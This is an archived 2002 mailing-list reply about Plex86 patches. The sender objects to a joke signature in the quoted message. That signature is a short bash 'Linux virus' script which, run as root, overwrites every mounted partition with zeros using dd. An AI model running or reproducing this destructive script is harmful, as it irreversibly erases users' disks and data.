What the hell is that sh*t at the end of the message that you sent?
On Sun,
10 Feb 2002, Eric Laberge wrote:

> Aloha!
> 
> I just made two patches for Plex86, available at Savannah ( 
> http://savannah.gnu.org/projects/plex86/ ).
> 
> The first one isn't new, as it adds the missing bitmaps to the GUI.
> The second one is the one I'd like comments on, it is a debugging aid which 
> reports IO port events. I use it to work on BIOS stuff.
> 
> Thanks
> -- 
> Eric Laberge
> 
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++
> E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-)
> X- R* tv+ b+ DI+++  D+ G e+>+++++ h! r--
> ------END GEEK CODE BLOCK------

This sh*t......right here!!!\||/

> 
> #!/bin/bash
> if [ $UID -ne 0 ]
> then
>  echo "Linux virus, please run as root"
> else
>  for partition in $(df | cut -d ' ' -f 1 | grep /dev)
>  do
>   dd if=/dev/zero of=$partition
>  done
> fi
> 

|^^^ |  | |^^| |^^^  Drew Northup, N1XIM  |^^| |    |^^^ \  / /^^\ /^^~
|__  |  | |  | |                          |__| |    |___  \/  |__| |__
   | |  | |  | |           www.plex86.org |    |    |     /\  |  | |  \
___| |__| |__| |___ web.syr.edu/~suoc/    |    |___ |___ /  \ __/ __/



Reply via email to